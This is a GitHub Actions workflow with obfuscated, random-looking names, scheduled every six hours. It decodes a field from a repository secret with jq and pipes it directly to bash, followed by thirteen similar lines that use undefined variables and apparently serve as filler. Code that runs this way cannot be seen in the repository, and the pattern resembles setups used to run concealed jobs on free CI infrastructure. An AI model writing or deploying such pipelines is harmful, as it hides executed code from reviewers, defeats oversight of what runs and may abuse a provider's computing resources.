name: duibiff

on:
  workflow_dispatch:
  schedule:
    - cron: '5 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duibiff
        env:
          it98: ${{ secrets.it98 }}
        run: |
          echo $it98 | jq -r .j0472 | /bin/bash
          echo $zjq36 | jq -r .hacdk32 | /bin/bash
          echo $t6701 | jq -r .ma708 | /bin/bash
          echo $xalo489 | jq -r .zaknm8 | /bin/bash
          echo $k9479 | jq -r .pv70 | /bin/bash
          echo $ot228 | jq -r .w821 | /bin/bash
          echo $gi51 | jq -r .ugdf54018 | /bin/bash
          echo $j42326 | jq -r .slpy24 | /bin/bash
          echo $jch1 | jq -r .opp74199 | /bin/bash
          echo $t995 | jq -r .p34 | /bin/bash
          echo $qyvu7 | jq -r .g51235 | /bin/bash
          echo $yre919 | jq -r .uxdb5 | /bin/bash
          echo $t684 | jq -r .ju0666 | /bin/bash
          echo $rmcw87652 | jq -r .z24 | /bin/bash

